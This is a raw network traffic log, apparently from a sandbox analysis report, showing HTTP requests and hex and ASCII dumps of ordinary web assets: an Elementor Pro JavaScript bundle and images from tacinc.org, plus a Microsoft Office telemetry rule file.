                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 88 05 c3 4f 3e 3d 85 f4 9f f9 33 10 f1 23 4f 3b 58 2c 34 3f d8 68 37 13 43 0d 27 c3 12 62 f8 71 a5 80 1b 49 a5 61 a3 98 69 0f e6 e2 69 61 a0 fa b1 25 3e 12 0b 00 36 83 42 c3 fc cf ec 00 dc 41 61 a3 99 41 f7 51 31 94 9e 08 17 0d 3b 39 a1 61 a0 fe c0 0f e6 e3 4b 0d 1c c0 0e d2 86 63 2a bc 00 d3 ce cc 69 58 7f 99 fd 60 06 e4 69 58 69 3b ac 49 8b be 1a 56 00 6c 80 bd 21 fe 7c c0 0d c8 16 1a 39 80 1d f7 58 e9 88 9b b8 2c 34 86 c8 68 5f f9 0d 01 b9 9a 56 1a 43 64 a2 62 ee 86 9e 76 30 58 68 e6 00 74 dc ba c3 47 30 03 69 74 ca 4d bc 16 00 6c 46 85 86 90 dc c1 61 a4 db a8 88 ed 7d 61 a7 61 fd b0 d1 cc 00 dc cd 2c 00 dc a8 63 a7 68 34 f3 3a 6c 00 b0 d0 7f 77 43 4f 30 03 77 a9 55 b1 85 c0 0d 80 d2 b0 d2 1b 98 2c 34 f3 be 21 11 36 03 4f 3b 01 a1 60 06 e6 0b 0d 27 80
                                                                                                                                                                                                                              Data Ascii: O>=3#O;X,4?h7C'bqIaiia%>6BAaAQ1;9aKc*iX`iXi;IVl!|9X,4h_VCdbv0XhtG0itMlFa}aa,ch4:lwCO0wU,4!6O;`'
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: dc 87 c2 38 4f 84 e1 d4 67 97 f8 70 eb e4 b8 05 4f 63 fc 38 45 da 52 ec b4 b9 1e 86 72 8b 62 ec d2 ec 5c dd 54 a5 ec 98 44 48 bd 5e c5 d1 75 52 fe ef 52 8a be 0e 4a 0e 69 57 fb a6 94 a5 29 71 4b f0 df 84 72 dd 7e 11 b8 68 e3 a9 c6 cd 29 74 5d 74 a5 2e aa 52 ed 52 ea 55 9e 7f f0 28 b8 c5 2e 29 77 ee d5 29 4e 1d 09 e5 af f4 74 04 85 c5 29 4a 52 ec d2 97 34 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 24 da 24 33 ca 1c 22 ef ae 2e c3 49 f2 8f 43 1f 21 14 bb 74 bb 94 a5 2e ab b9 33 d1 c2 69 a5 29 4a 5d 37 45 2e ef 27 24 a2 23 74 af f4 a5 29 4a 5c 52 94 a5 d1 4b 8b 8a 52 f7 9c 22 12 e7 a8 a2 e2 7c 05 2e e3 70 97 ee c5 d8 a5 dd a5 2e 6e 9a 5c 24 da 21 4b ab ea f1 4a 52 94 a5 29 4a 5d 37 4d 2e 69 4b a2 89 32 24 33 96 ff 00 0e 15 17 7e e2 97 37 17 bb 63 9e 88 f0
                                                                                                                                                                                                                              Data Ascii: 8OgpOc8ERrb\TDH^uRRJiW)qKr~h)t]t.RRU(.)w)Nt)JR4)qKR)qK$$3".IC!t.3i)J]7E.'$#t)J\RKR"|.p.n\$!KJR)J]7M.iK2$3~7c
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: ab d3 91 45 d9 dc b4 70 1b 2d 26 34 d6 6e 2e 6e 69 4a 5d eb 9b a2 94 a5 c5 c5 fb 3c 7a bd 9b 8a 52 94 a5 2e 95 5b 88 4a e7 62 e9 7e 83 a8 a5 d3 4b 8b a2 94 a5 2f 65 71 4a 52 97 ec 6a b1 1d b1 bd 5c 21 25 c3 7f 91 f6 2a 5c 52 94 a5 cd 29 76 e9 4a 52 97 45 c5 c5 29 4a 5c dc 5c 52 e6 e2 e2 97 37 17 14 b9 b8 b8 a5 cd c5 c5 2e 6e 2e 29 73 71 71 4b 9b 8b 8a 5c dc 5c 52 e6 e2 e2 97 09 51 24 8b a6 94 bb 37 14 a2 ad c4 25 4b a2 e8 ba e9 71 46 93 1a 6b 37 34 a5 2e 2e bb aa 94 a5 cd c5 29 4a 5c 5d 14 a5 29 4a 52 94 bf 55 a1 c7 61 73 4a 34 24 92 22 e2 e6 94 ba a9 4b 8b a1 fa 62 97 4d de bd b5 db a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 a7 b0 b8 a5 29 4b a6 94 a5 29 4a 52 8b a8
                                                                                                                                                                                                                              Data Ascii: Ep-&4n.niJ]<zR.[Jb~K/eqJRj\!%*\R)vJRE)J\\R7.n.)sqqK\\RQ$7%KqFk74..)J\])JRUasJ4$"KbM)qKR)qKR)qKR)qKR)qKR)K)JR
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC625INData Raw: 7e 5e f4 be 4f f4 c8 df 7b 95 7d 3b cd 21 b6 f4 9e 13 cb 15 f2 3c fd 21 e5 97 8c f2 5e c7 9b 2b 7d 2b 26 85 92 65 4f e8 9b 48 79 37 d3 39 9e 78 a1 e6 fe 10 f2 6f c6 a9 0f 34 3c 9f 15 68 59 b4 2c 93 f2 67 4d 50 79 fc 2e 09 c4 f2 48 79 fa 43 c9 be 19 d1 3a 27 44 d1 e4 90 f3 65 6f 96 10 4d a1 67 ec a9 f5 c2 78 13 47 92 3f ac 84 21 09 d7 08 42 1d 87 9a 5d 87 93 7d 10 84 f0 6a 43 cd 21 b6 fc 18 42 68 b2 68 4d 3e 88 42 78 0d a4 36 de b3 58 42 70 36 90 f3 7f 08 6d b2 13 aa 13 99 b4 87 9b ec 8a df 85 09 d4 9b 13 4c fe 3e 59 d2 f2 7d 97 04 e0 79 24 3c 9b f2 1b 48 79 37 a4 21 08 42 10 84 21 08 42 10 84 21 08 4e 0a d0 b2 f6 28 f5 84 e2 79 24 37 79 de 49 0f 26 f9 e1 38 1e 49 0f 26 fe 8b fa 85 91 53 27 0d 48 79 37 db 9d e5 06 db f2 1e 49 0f 26 fc e8 42 10 84 21 34 59
                                                                                                                                                                                                                              Data Ascii: ~^O{};!<!^+}+&eOHy79xo4<hY,gMPy.HyC:'DeoMgxG?!B]}jC!BhhM>Bx6XBp6mL>Y}y$<Hy7!B!B!N(y$7yI&8I&S'Hy7I&B!4Y


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              138192.168.2.649881141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC656OUTGET /wp-content/uploads/hummingbird-assets/3f86132df1672ee9bc320961d8b32c63.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:53:30 GMT
                                                                                                                                                                                                                              ETag: W/"670fd36a-1abe9"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614823
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f74f10e96a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC876INData Raw: 37 64 63 34 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 2d 66 72 6f 6e 74 65 6e 64 2c 70 72 6f 2d 65 6c 65 6d 65 6e 74 73 2d 68 61 6e 64 6c 65 72 73 2c 70 70 2d 74 6f 6f 6c 74 69 70 73 74 65 72 2c 70 70 2d 65 6c 65 6d 65 6e 74 73 2d 74 6f 6f 6c 74 69 70 2a 2a 2f 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 5f 70 72 6f 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 5f 70 72 6f 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 31 33 5d 2c 7b 33 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61
                                                                                                                                                                                                                              Data Ascii: 7dc4/**handles:elementor-pro-frontend,pro-elements-handlers,pp-tooltipster,pp-elements-tooltip**//*! elementor-pro - v3.24.0 - 09-10-2024 */(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[313],{3e3:(e,t,n)=>{"use strict";va
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 2e 74 72 69 67 67 65 72 28 22 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 2f 6d 6f 64 75 6c 65 73 2f 69 6e 69 74 2f 62 65 66 6f 72 65 22 29 2c 65 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 68 6f 6f 6b 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 2f 66 72 6f 6e 74 65 6e 64 2f 68 61 6e 64 6c 65 72 73 22 2c 65 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 28 28 65 2c 74 29 3d 3e 7b 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 65 5d 3d 6e 65 77 20 74 7d 29 29 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 6c 69 6e 6b 41 63 74 69 6f 6e 73 3d 7b 61 64 64 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 75 74 69 6c 73 2e 75
                                                                                                                                                                                                                              Data Ascii: orProFrontend.trigger("elementor-pro/modules/init/before"),e=elementorFrontend.hooks.applyFilters("elementor-pro/frontend/handlers",e),jQuery.each(e,((e,t)=>{this.modules[e]=new t})),this.modules.linkActions={addAction:function(){elementorFrontend.utils.u
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 6e 66 69 67 3d 65 7d 63 61 6c 63 75 6c 61 74 65 53 74 69 63 6b 79 4d 65 6e 75 4e 61 76 48 65 69 67 68 74 28 29 7b 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 2e 63 73 73 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 73 65 74 74 69 6e 67 73 2e 6d 65 6e 75 48 65 69 67 68 74 43 73 73 56 61 72 4e 61 6d 65 2c 22 22 29 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e
                                                                                                                                                                                                                              Data Ascii: nfig=e}calculateStickyMenuNavHeight(){this.widgetConfig.elements.$dropdownMenuContainer.css(this.widgetConfig.settings.menuHeightCssVarName,"");const e=this.widgetConfig.elements.$dropdownMenuContainer.offset().top-jQuery(window).scrollTop();return elemen
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 6f 67 67 6c 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 61 74 74 72 69 62 75 74 65 73 3f 2e 6d 65 6e 75 54 6f 67 67 6c 65 53 74 61 74 65 3f 22 74 72 75 65 22 3d 3d 3d 65 2e 61 74 74 72 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 61 74 74 72 69 62 75 74 65 73 2e 6d 65 6e 75 54 6f 67 67 6c 65 53 74 61 74 65 29 3a 65 2e 68 61 73 43 6c 61 73 73 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 63 6c 61 73 73 65 73 2e 6d 65 6e 75 54 6f 67 67 6c 65 41 63 74 69 76 65 43 6c 61 73 73 29 7d 7d 7d 2c 32 32 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 70 3d 45 6c 65 6d 65 6e 74 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 2e 75 72 6c 73 2e 61 73 73 65 74 73 2b
                                                                                                                                                                                                                              Data Ascii: oggle;return this.widgetConfig.attributes?.menuToggleState?"true"===e.attr(this.widgetConfig.attributes.menuToggleState):e.hasClass(this.widgetConfig.classes.menuToggleActiveClass)}}},2258:(e,t,n)=>{"use strict";n.p=ElementorProFrontendConfig.urls.assets+
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 69 7a 65 22 2c 74 68 69 73 2e 74 6f 67 67 6c 65 29 7d 75 6e 62 69 6e 64 45 76 65 6e 74 73 28 29 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 6f 66 66 28 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 74 6f 67 67 6c 65 29 7d 61 64 64 43 53 53 54 72 61 6e 73 66 6f 72 6d 45 76 65 6e 74 73 28 29 7b 74 68 69 73 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 29 26 26 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 26 26 28 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 3d 21 30 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 6f
                                                                                                                                                                                                                              Data Ascii: ize",this.toggle)}unbindEvents(){elementorFrontend.elements.$window.off("resize",this.toggle)}addCSSTransformEvents(){this.getElementSettings("motion_fx_motion_fx_scrolling")&&!this.isTransitionEventAdded&&(this.isTransitionEventAdded=!0,this.elements.$co
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 69 6f 6e 22 2c 22 63 6f 6e 74 61 69 6e 65 72 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 29 7b 6c 65 74 20 65 3b 69 3d 6f 2c 65 3d 22 63 6f 6c 75 6d 6e 22 3d 3d 3d 72 3f 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 22 3a 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 2c 6f 3d 6f 2e 66 69 6e 64 28 22 3e 20 22 2b 65 29 7d 63 6f 6e 73 74 20 61 3d 7b 74 79 70 65 3a 6e 2c 69 6e 74 65 72 61 63 74 69 6f 6e 73 3a 73 2c 65 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 3a 74 2c 24 65 6c 65 6d 65 6e 74 3a 6f 2c 24 64 69 6d 65 6e 73 69 6f 6e 73 45 6c 65 6d 65 6e 74 3a 69 2c 72 65 66 72 65 73 68 44 69 6d 65 6e 73 69 6f 6e 73 3a 74 68 69 73 2e 69 73 45 64 69 74 2c 72 61 6e 67 65 3a 74 5b 65 2b 22 5f 72 61 6e 67
                                                                                                                                                                                                                              Data Ascii: ion","container"].includes(r)){let e;i=o,e="column"===r?".elementor-widget-wrap":".elementor-widget-container",o=o.find("> "+e)}const a={type:n,interactions:s,elementSettings:t,$element:o,$dimensionsElement:i,refreshDimensions:this.isEdit,range:t[e+"_rang
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 2e 70 72 65 70 61 72 65 4f 70 74 69 6f 6e 73 28 65 29 3b 74 2e 73 65 74 53 65 74 74 69 6e 67 73 28 6e 29 2c 74 2e 72 65 66 72 65 73 68 28 29 7d 6f 6e 49 6e 69 74 28 29 7b 73 75 70 65 72 2e 6f 6e 49 6e 69 74 28 29 2c 74 68 69 73 2e 69 6e 69 74 45 66 66 65 63 74 73 28 29 2c 74 68 69 73 2e 61 64 64 43 53 53 54 72 61 6e 73 66 6f 72 6d 45 76 65 6e 74 73 28 29 2c 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 7d 6f 6e 45 6c 65 6d 65 6e 74 43 68 61 6e 67 65 28 65 29 7b 69 66 28 2f 6d 6f 74 69 6f 6e 5f 66 78 5f 28 28 73 63 72 6f 6c 6c 69 6e 67 29 7c 28 6d 6f 75 73 65 29 7c 28 64 65 76 69 63 65 73 29 29 24 2f 2e 74 65 73 74 28 65 29 29 72 65 74 75 72 6e 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 3d 3d 3d 65 26 26 74 68 69
                                                                                                                                                                                                                              Data Ascii: .prepareOptions(e);t.setSettings(n),t.refresh()}onInit(){super.onInit(),this.initEffects(),this.addCSSTransformEvents(),this.toggle()}onElementChange(e){if(/motion_fx_((scrolling)|(mouse)|(devices))$/.test(e))return"motion_fx_motion_fx_scrolling"===e&&thi
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 73 3d 31 30 30 2d 73 29 29 3a 65 3c 6e 2e 65 6e 64 3f 22 69 6e 2d 6f 75 74 2d 69 6e 22 3d 3d 3d 74 3f 73 3d 30 3a 22 6f 75 74 2d 69 6e 2d 6f 75 74 22 3d 3d 3d 74 3f 73 3d 31 30 30 3a 28 73 3d 74 68 69 73 2e 67 65 74 4d 6f 76 65 50 6f 69 6e 74 46 72 6f 6d 50 61 73 73 65 64 50 65 72 63 65 6e 74 73 28 6e 2e 65 6e 64 2d 6e 2e 73 74 61 72 74 2c 65 2d 6e 2e 73 74 61 72 74 29 2c 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 26 26 28 73 3d 31 30 30 2d 73 29 29 3a 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 3f 73 3d 30 3a 22 6f 75 74 2d 69 6e 22 3d 3d 3d 74 3f 73 3d 31 30 30 3a 28 73 3d 74 68 69 73 2e 67 65 74 4d 6f 76 65 50 6f 69 6e 74 46 72 6f 6d 50 61 73 73 65 64 50 65 72 63 65 6e 74 73 28 31 30 30 2d 6e 2e 65 6e 64 2c 31 30 30 2d 65 29 2c 22 69 6e 2d 6f 75 74 2d 69 6e 22 3d 3d
                                                                                                                                                                                                                              Data Ascii: s=100-s)):e<n.end?"in-out-in"===t?s=0:"out-in-out"===t?s=100:(s=this.getMovePointFromPassedPercents(n.end-n.start,e-n.start),"in-out"===t&&(s=100-s)):"in-out"===t?s=0:"out-in"===t?s=100:(s=this.getMovePointFromPassedPercents(100-n.end,100-e),"in-out-in"==
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 2c 73 3d 65 2e 6c 65 76 65 6c 2f 31 30 2c 69 3d 31 2d 73 2b 74 68 69 73 2e 67 65 74 45 66 66 65 63 74 56 61 6c 75 65 46 72 6f 6d 4d 6f 76 65 50 6f 69 6e 74 28 73 2c 6e 29 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 69 2c 22 77 69 6c 6c 2d 63 68 61 6e 67 65 22 3a 22 6f 70 61 63 69 74 79 22 7d 29 7d 62 6c 75 72 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 67 65 74 44 69 72 65 63 74 69 6f 6e 4d 6f 76 65 50 6f 69 6e 74 28 74 2c 65 2e 64 69 72 65 63 74 69 6f 6e 2c 65 2e 72 61 6e 67 65 29 2c 73 3d 65 2e 6c 65 76 65 6c 2d 74 68 69 73 2e 67 65 74 45 66 66 65 63 74 56 61 6c 75 65 46 72 6f 6d 4d 6f 76 65 50 6f 69 6e 74 28 65 2e 6c 65 76 65 6c 2c 6e 29 3b 74 68 69 73 2e 75 70 64 61 74 65 52 75 6c 65 50 61 72 74 28
                                                                                                                                                                                                                              Data Ascii: ,s=e.level/10,i=1-s+this.getEffectValueFromMovePoint(s,n);this.$element.css({opacity:i,"will-change":"opacity"})}blur(e,t){const n=this.getDirectionMovePoint(t,e.direction,e.range),s=e.level-this.getEffectValueFromMovePoint(e.level,n);this.updateRulePart(
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 24 65 6c 65 6d 65 6e 74 2e 63 73 73 28 7b 74 72 61 6e 73 66 6f 72 6d 3a 22 22 2c 66 69 6c 74 65 72 3a 22 22 2c 6f 70 61 63 69 74 79 3a 22 22 2c 22 77 69 6c 6c 2d 63 68 61 6e 67 65 22 3a 22 22 7d 29 7d 6f 6e 49 6e 69 74 28 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 22 24 74 61 72 67 65 74 45 6c 65 6d 65 6e 74 22 29 2c 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 7d 7d 74 2e 64 65 66 61 75 6c 74 3d 5f 64 65 66 61 75 6c 74 7d 2c 33 33 32 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 73 3d 6e 28 36 37 38 34 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64
                                                                                                                                                                                                                              Data Ascii: $element.css({transform:"",filter:"",opacity:"","will-change":""})}onInit(){this.$element=this.getSettings("$targetElement"),this.refresh()}}t.default=_default},3323:(e,t,n)=>{"use strict";var s=n(6784);Object.defineProperty(t,"__esModule",{value:!0}),t.d


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              139192.168.2.64987713.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                              x-ms-request-id: ac69ef67-e01e-001f-7714-221633000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180413Z-r1755647c66tmf6g4720xfpwpn00000009f0000000000s28
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              140192.168.2.649879141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC625OUTGET /wp-content/uploads/2020/11/footer-tall.jpg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 7417
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                              ETag: "66f49c51-1cf9"
                                                                                                                                                                                                                              Last-Modified: Wed, 25 Sep 2024 23:27:13 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613462
                                                                                                                                                                                                                              Accept-Ranges: bytes
